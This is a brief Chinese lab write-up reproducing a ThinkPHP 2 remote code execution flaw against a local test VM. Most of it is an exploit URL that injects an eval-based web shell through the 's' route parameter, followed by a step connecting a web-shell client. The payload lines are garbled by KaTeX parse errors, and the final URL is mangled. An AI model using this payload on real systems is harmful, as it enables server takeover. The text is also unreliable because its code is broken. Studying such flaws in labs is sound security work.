thinkphp 2 - rce漏洞复现
用渗透版火狐打开
http://192.168.127.131:8080/?s=/index/index/L/KaTeX parse error: Expected '}', got 'EOF' at end of input:{@print(eval(_POST[1]))}
打开页面成功说明存在漏洞
利用eval函数进行绕过
?s=/index/index/L/KaTeX parse error: Expected '}', got 'EOF' at end of input:{@print(eval(_POST[1]))}

使用一剑连接
http://192.168.127.131:8080/?s=/index/index/L/=/index/index/index/index/

本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!
